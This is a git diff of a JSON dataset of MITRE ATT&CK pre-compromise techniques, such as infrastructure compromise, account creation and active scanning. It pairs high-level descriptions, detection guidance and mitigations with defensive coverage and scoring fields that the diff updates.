-                "description": "Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations.\n\nAdversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189).",
-                "detection": "Once adversaries have provisioned software on a compromised server (ex: for use as a command and control server), internet scans may reveal servers that adversaries have compromised. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1584.005",
-                "name": "Compromise Infrastructure: Botnet",
-                "url": "https://attack.mitre.org/techniques/T1584/005",
-                "description": "Adversaries may compromise numerous third-party systems to form a botnet that can be used during targeting. A botnet is a network of compromised systems that can be instructed to perform coordinated tasks.(Citation: Norton Botnet) Instead of purchasing/renting a botnet from a booter/stresser service(Citation: Imperva DDoS for Hire), adversaries may build their own botnet by compromising numerous third-party systems. Adversaries may also conduct a takeover of an existing botnet, such as redirecting bots to adversary-controlled C2 servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal, adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566) or Distributed Denial of Service (DDoS).",
-                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during [Phishing](https://attack.mitre.org/techniques/T1566), [Endpoint Denial of Service](https://attack.mitre.org/techniques/T1499), or [Network Denial of Service](https://attack.mitre.org/techniques/T1498).",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1593",
+        "subtechniques": [],
+        "mitigations": [
             {
-                "tid": "T1584.006",
-                "name": "Compromise Infrastructure: Web Services",
-                "url": "https://attack.mitre.org/techniques/T1584/006",
-                "description": "Adversaries may compromise access to third-party web services that can be used during targeting. A variety of popular websites exist for legitimate users to register for web-based services, such as GitHub, Twitter, Dropbox, Google, etc. Adversaries may try to take ownership of a legitimate user's access to a web service and use that web service as infrastructure in support of cyber operations. Such web services can be abused during later stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).(Citation: Recorded Future Turla Infra 2020) Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. By utilizing a web service, particularly when access is stolen from legitimate users, adversaries can make it difficult to physically tie back operations to them.",
-                "detection": "Once adversaries leverage the abused web service as infrastructure (ex: for command and control), it may be possible to look for unique characteristics associated with adversary software, if known.(Citation: ThreatConnect Infrastructure Dec 2020)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control ([Web Service](https://attack.mitre.org/techniques/T1102)) or [Exfiltration Over Web Service](https://attack.mitre.org/techniques/T1567).",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
+                "mid": "M1056",
+                "name": "Pre-compromise",
+                "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
+                "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1593.002",
+        "name": "Search Open Websites/Domains: Search Engines",
+        "description": "Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)\n\nAdversaries may craft various search engine queries depending on what information they seek to gather. Threat actors may use search engines to harvest general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive information such as network details or credentials. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "url": "https://attack.mitre.org/techniques/T1593/002",
+        "tactics": [
+            "Reconnaissance"
+        ],
+        "detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
+        "platforms": [
+            "PRE"
+        ],
+        "data_sources": [],
+        "is_subtechnique": true,
+        "supertechnique": "T1593",
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1056",
@@ -18692,8 +41466,8 @@
                 "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.05401915,
-        "adjusted_score": 0.05401915,
+        "cumulative_score": 0.05,
+        "adjusted_score": 0.05,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
@@ -18702,63 +41476,28 @@
         "nist_controls": [],
         "process_coverage": false,
         "network_coverage": false,
-        "file_coverage": true,
+        "file_coverage": false,
         "cloud_coverage": false,
-        "hardware_coverage": false,
-        "actionability_score": {},
-        "choke_point_score": 0.05,
-        "prevalence_score": 0.00401915
+        "hardware_coverage": false
     },
     {
-        "tid": "T1585",
-        "name": "Establish Accounts",
-        "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1)",
-        "url": "https://attack.mitre.org/techniques/T1585",
+        "tid": "T1594",
+        "name": "Search Victim-Owned Websites",
+        "description": "Adversaries may search websites owned by the victim for information that can be used during targeting. Victim-owned websites may contain a variety of details, including names of departments/divisions, physical locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business operations and relationships.(Citation: Comparitech Leak)\n\nAdversaries may search victim-owned websites to gather actionable information. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "url": "https://attack.mitre.org/techniques/T1594",
         "tactics": [
-            "Resource Development"
+            "Reconnaissance"
         ],
-        "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "detection": "Monitor for suspicious network traffic that could be indicative of adversary reconnaissance, such as rapid successions of requests indicative of web crawling and/or large quantities of requests originating from a single source (especially if the source is known to be associated with an adversary). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.",
         "platforms": [
             "PRE"
         ],
         "data_sources": [
-            "Network Traffic: Network Traffic Content",
-            "Persona: Social Media"
+            "Application Log: Application Log Content"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1585.001",
-                "name": "Establish Accounts: Social Media Accounts",
-                "url": "https://attack.mitre.org/techniques/T1585/001",
-                "description": "Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona  on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos. \n\nOnce a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
-                "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1585.002",
-                "name": "Establish Accounts: Email Accounts",
-                "url": "https://attack.mitre.org/techniques/T1585/002",
-                "description": "Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) Adversaries may also take steps to cultivate a persona around the email account, such as through use of [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001), to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).(Citation: Mandiant APT1)\n\nTo decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.(Citation: Trend Micro R980 2016)",
-                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            }
-        ],
+        "subtechniques": [],
         "mitigations": [
             {
                 "mid": "M1056",
@@ -18767,48 +41506,51 @@
                 "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.05,
-        "adjusted_score": 0.05,
+        "cumulative_score": 0.05476190476190476,
+        "adjusted_score": 0.05476190476190476,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
-        "has_splunk": false,
+        "has_splunk": true,
         "cis_controls": [],
         "nist_controls": [],
         "process_coverage": false,
-        "network_coverage": true,
-        "file_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
         "cloud_coverage": false,
         "hardware_coverage": false,
-        "actionability_score": {},
+        "actionability_score": {
+            "combined_score": 0.0047619047619047615,
+            "detection_score": 0.01
+        },
         "choke_point_score": 0.05,
         "prevalence_score": 0
     },
     {
-        "tid": "T1586",
-        "name": "Compromise Accounts",
-        "description": "Adversaries may compromise accounts with services that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating accounts (i.e. [Establish Accounts](https://attack.mitre.org/techniques/T1585)), adversaries may compromise existing accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, etc.). Compromised accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries may directly leverage compromised email accounts for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).",
-        "url": "https://attack.mitre.org/techniques/T1586",
+        "tid": "T1595",
+        "name": "Active Scanning",
+        "description": "Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.\n\nAdversaries may perform different forms of active scanning depending on what information they seek to gather. These scans can also be performed in various ways, including using native features of network protocols such as ICMP.(Citation: Botnet Scan)(Citation: OWASP Fingerprinting) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
+        "url": "https://attack.mitre.org/techniques/T1595",
         "tactics": [
-            "Resource Development"
+            "Reconnaissance"
         ],
-        "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+        "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
             "PRE"
         ],
         "data_sources": [
             "Network Traffic: Network Traffic Content",
-            "Persona: Social Media"
+            "Network Traffic: Network Traffic Flow"
         ],
         "is_subtechnique": false,
         "supertechnique": null,
         "subtechniques": [
             {
-                "tid": "T1586.001",
-                "name": "Compromise Accounts: Social Media Accounts",
-                "url": "https://attack.mitre.org/techniques/T1586/001",
-                "description": "Adversaries may compromise social media accounts that can be used during targeting. For operations incorporating social engineering, the utilization of an online persona may be important. Rather than creating and cultivating social media profiles (i.e. [Social Media Accounts](https://attack.mitre.org/techniques/T1585/001)), adversaries may compromise existing social media accounts. Utilizing an existing persona may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. \n\nA variety of methods exist for compromising social media accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising social media accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nPersonas may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Compromised social media accounts may require additional development, this could include filling out or modifying profile information, further developing social networks, or incorporating photos.\n\nAdversaries can use a compromised social media profile to create new, or hijack existing, connections to targets of interest. These connections may be direct or may include trying to connect through others.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage) Compromised profiles may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
-                "detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)).",
+                "tid": "T1595.001",
+                "name": "Active Scanning: Scanning IP Blocks",
+                "url": "https://attack.mitre.org/techniques/T1595/001",
+                "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+                "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -18816,14 +41558,14 @@
                         "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
                         "url": "https://attack.mitre.org/mitigations/M1056"
                     }
-                ]
-            },
-            {
-                "tid": "T1586.002",
-                "name": "Compromise Accounts: Email Accounts",
-                "url": "https://attack.mitre.org/techniques/T1586/002",
-                "description": "Adversaries may compromise email accounts that can be used during targeting. Adversaries can use compromised email accounts to further their operations, such as leveraging them to conduct [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566). Utilizing an existing persona with a compromised email account may engender a level of trust in a potential victim if they have a relationship, or knowledge of, the compromised persona. Compromised email accounts can also be used in the acquisition of infrastructure (ex: [Domains](https://attack.mitre.org/techniques/T1583/001)).\n\nA variety of methods exist for compromising email accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, or by brute forcing credentials (ex: password reuse from breach credential dumps).(Citation: AnonHBGary) Prior to compromising email accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation.\n\nAdversaries can use a compromised email account to hijack existing email threads with targets of interest.",
-                "detection": "Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).",
+                ]
+            },
+            {
+                "tid": "T1595.002",
+                "name": "Active Scanning: Vulnerability Scanning",
+                "url": "https://attack.mitre.org/techniques/T1595/002",
+                "description": "Adversaries may scan victims for vulnerabilities that can be used during targeting. Vulnerability scans typically check if the configuration of a target host/application (ex: software and version) potentially aligns with the target of a specific exploit the adversary may seek to use.\n\nThese scans may also include more broad attempts to [Gather Victim Host Information](https://attack.mitre.org/techniques/T1592) that can be used to identify more commonly known, exploitable vulnerabilities. Vulnerability scans typically harvest running software and version numbers via server banners, listening ports, or other network artifacts.(Citation: OWASP Vuln Scanning) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).",
+                "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet). Analyzing web metadata may also reveal artifacts that can be attributed to potentially malicious activity, such as referer or user-agent string HTTP/S fields.\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
                 "mitigations": [
                     {
                         "mid": "M1056",
@@ -18842,104 +41584,47 @@
                 "url": "https://attack.mitre.org/mitigations/M1056"
             }
         ],
-        "cumulative_score": 0.05,
-        "adjusted_score": 0.05,
+        "cumulative_score": 0.06904761904761905,
+        "adjusted_score": 0.06904761904761905,
         "has_car": false,
         "has_sigma": false,
         "has_es_siem": false,
         "has_splunk": false,
-        "cis_controls": [],
+        "cis_controls": [
+            "18.2",
+            "18.3"
+        ],
         "nist_controls": [],
         "process_coverage": false,
         "network_coverage": true,
         "file_coverage": false,
         "cloud_coverage": false,
         "hardware_coverage": false,
-        "actionability_score": {},
+        "actionability_score": {
+            "combined_score": 0.01904761904761905,
+            "mitigation_score": 0.03636363636363636
+        },
         "choke_point_score": 0.05,
         "prevalence_score": 0
     },
     {
-        "tid": "T1587",
-        "name": "Develop Capabilities",
-        "description": "Adversaries may build capabilities that can be used during targeting. Rather than purchasing, freely downloading, or stealing capabilities, adversaries may develop their own capabilities in-house. This is the process of identifying development requirements and building solutions such as malware, exploits, and self-signed certificates. Adversaries may develop capabilities to support their operations throughout numerous phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: Bitdefender StrongPity June 2020)(Citation: Talos Promethium June 2020)\n\nAs with legitimate development efforts, different skill sets may be required for developing capabilities. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the capability.",
-        "url": "https://attack.mitre.org/techniques/T1587",
+        "tid": "T1595.001",
+        "name": "Active Scanning: Scanning IP Blocks",
+        "description": "Adversaries may scan victim IP blocks to gather information that can be used during targeting. Public IP addresses may be allocated to organizations by block, or a range of sequential addresses.\n\nAdversaries may scan IP blocks in order to [Gather Victim Network Information](https://attack.mitre.org/techniques/T1590), such as which IP addresses are actively in use as well as more detailed information about hosts assigned these addresses. Scans may range from simple pings (ICMP requests and responses) to more nuanced scans that may reveal host software/versions via server banners or other network artifacts.(Citation: Botnet Scan) Information from these scans may reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593) or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)).",
+        "url": "https://attack.mitre.org/techniques/T1595/001",
         "tactics": [
-            "Resource Development"
+            "Reconnaissance"
         ],
-        "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nConsider use of services that may aid in the tracking of certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.",
+        "detection": "Monitor for suspicious network traffic that could be indicative of scanning, such as large quantities originating from a single source (especially if the source is known to be associated with an adversary/botnet).\n\nMuch of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.",
         "platforms": [
             "PRE"
         ],
         "data_sources": [
-            "Internet Scan: Response Content",
-            "Malware Repository: Malware Content",
-            "Malware Repository: Malware Metadata"
-        ],
-        "is_subtechnique": false,
-        "supertechnique": null,
-        "subtechniques": [
-            {
-                "tid": "T1587.001",
-                "name": "Develop Capabilities: Malware",
-                "url": "https://attack.mitre.org/techniques/T1587/001",
-                "description": "Adversaries may develop malware and malware components that can be used during targeting. Building malicious software can include the development of payloads, droppers, post-compromise tools, backdoors (including backdoored images), packers, C2 protocols, and the creation of infected removable media. Adversaries may develop malware to support their operations, creating a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.(Citation: Mandiant APT1)(Citation: Kaspersky Sofacy)(Citation: ActiveMalwareEnergy)(Citation: FBI Flash FIN7 USB)\n\nAs with legitimate development efforts, different skill sets may be required for developing malware. The skills needed may be located in-house, or may need to be contracted out. Use of a contractor may be considered an extension of that adversary's malware development capabilities, provided the adversary plays a role in shaping requirements and maintains a degree of exclusivity to the malware.\n\nSome aspects of malware development, such as C2 protocol development, may require adversaries to obtain additional infrastructure. For example, malware developed that will communicate with Twitter for C2, may require use of [Web Services](https://attack.mitre.org/techniques/T1583/006).(Citation: FireEye APT29)",
-                "detection": "Consider analyzing malware for features that may be associated with the adversary and/or their developers, such as compiler used, debugging artifacts, or code similarities. Malware repositories can also be used to identify additional samples associated with the adversary and identify development patterns over time.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1587.002",
-                "name": "Develop Capabilities: Code Signing Certificates",
-                "url": "https://attack.mitre.org/techniques/T1587/002",
-                "description": "Adversaries may create self-signed code signing certificates that can be used during targeting. Code signing is the process of digitally signing executables and scripts to confirm the software author and guarantee that the code has not been altered or corrupted. Code signing provides a level of authenticity for a program from the developer and a guarantee that the program has not been tampered with.(Citation: Wikipedia Code Signing) Users and/or security tools may trust a signed piece of code more than an unsigned piece of code even if they don't know who issued the certificate or who the author is.\n\nPrior to [Code Signing](https://attack.mitre.org/techniques/T1553/002), adversaries may develop self-signed code signing certificates for use in operations.",
-                "detection": "Consider analyzing self-signed code signing certificates for features that may be associated with the adversary and/or their developers, such as the thumbprint, algorithm used, validity period, and common name. Malware repositories can also be used to identify additional samples associated with the adversary and identify patterns an adversary has used in crafting self-signed code signing certificates.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related follow-on behavior, such as [Code Signing](https://attack.mitre.org/techniques/T1553/002) or [Install Root Certificate](https://attack.mitre.org/techniques/T1553/004).",
-                "mitigations": [
-                    {
-                        "mid": "M1056",
-                        "name": "Pre-compromise",
-                        "description": "This category is used for any applicable mitigation activities that apply to techniques occurring before an adversary gains Initial Access, such as Reconnaissance and Resource Development techniques.",
-                        "url": "https://attack.mitre.org/mitigations/M1056"
-                    }
-                ]
-            },
-            {
-                "tid": "T1587.003",
-                "name": "Develop Capabilities: Digital Certificates",
-                "url": "https://attack.mitre.org/techniques/T1587/003",
